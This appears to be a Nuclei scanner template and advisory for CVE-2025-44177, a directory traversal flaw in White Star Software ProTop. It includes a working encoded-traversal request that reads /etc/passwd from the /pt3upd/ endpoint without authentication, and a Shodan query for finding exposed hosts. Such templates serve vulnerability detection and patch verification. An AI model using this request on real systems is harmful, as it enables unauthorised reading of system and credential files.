A directory traversal vulnerability was discovered in White Star Software Protop version 4.4.2-2024-11-27, specifically in the /pt3upd/ endpoint. An unauthenticated attacker can remotely read arbitrary files on the underlying OS using encoded traversal sequences.
PoC代码[已公开]
id: CVE-2025-44177
info:
name: White Star Software ProTop - Directory Traversal
author: s-cu-bot
severity: high
description: |
A directory traversal vulnerability was discovered in White Star Software Protop version 4.4.2-2024-11-27, specifically in the /pt3upd/ endpoint. An unauthenticated attacker can remotely read arbitrary files on the underlying OS using encoded traversal sequences.
remediation: |
Upgrade White Star Software ProTop to a version after v4.4.2-2024-11-27.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2025-44177
- https://client.protop.co.za/
- https://wss.com/
- https://gist.github.com/stSLAYER/4a2ecfbab1215a0be0dde59c4ac0122d
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N
cvss-score: 8.2
cve-id: CVE-2025-44177
epss-score: 0.06893
epss-percentile: 0.91031
cwe-id: CWE-22
cpe: cpe:2.3:a:wss:protop:4.4.2-2024-11-27:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: white-star-software
product: protop
shodan-query: html:"<title>ProTop"
tags: cve,cve2025,lfi,traversal,protop,whitestar,vkev,vuln
http:
- raw:
- |
GET /pt3upd/..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- 'root:.*:0:0:'
- type: word
part: header
words:
- 'application/octet-stream'
- 'filename="passwd"'
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100faab99411bf917b9034a945608547ff94570cda4a2d217dd5f9c081263335af90221008e428ea1f32da27a19c714d5b81549b96e4f7affea1dff740210dc0498a24c1e:922c64590222798bb761d5b6d8e72950